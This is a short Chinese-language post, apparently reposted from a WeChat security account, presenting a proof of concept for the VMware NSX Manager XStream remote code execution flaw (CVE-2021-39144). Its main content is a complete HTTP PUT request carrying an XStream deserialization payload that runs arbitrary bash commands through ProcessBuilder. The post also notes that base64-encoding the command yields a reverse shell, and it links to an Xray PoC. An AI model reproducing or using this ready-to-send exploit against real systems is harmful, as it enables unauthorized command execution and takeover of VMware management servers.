免责声明
简介
访问VMware Appliance Management页面,如图:
使用下面Poc进行命令执行测试:
PUT /api/2.0/services/usermgmt/password/abc HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Connection: closeContent-Type: application/xmlContent-Length: 546<sorted-set><string>foo</string><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder"><command><string>bash</string><string>-c</string><string>cmd</string></command></target><action>start</action></handler></dynamic-proxy></sorted-set>
GetShell
直接bash会因为特殊字符无法获得shell。通过base64编码一下即可反弹shell,如图:
Xray Poc
https://t.zsxq.com/08OAm0JQ9
原文始发于微信公众号(Hack All):VMware NSX Manager XStream 远程代码执行漏洞(CVE-2021-39144)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论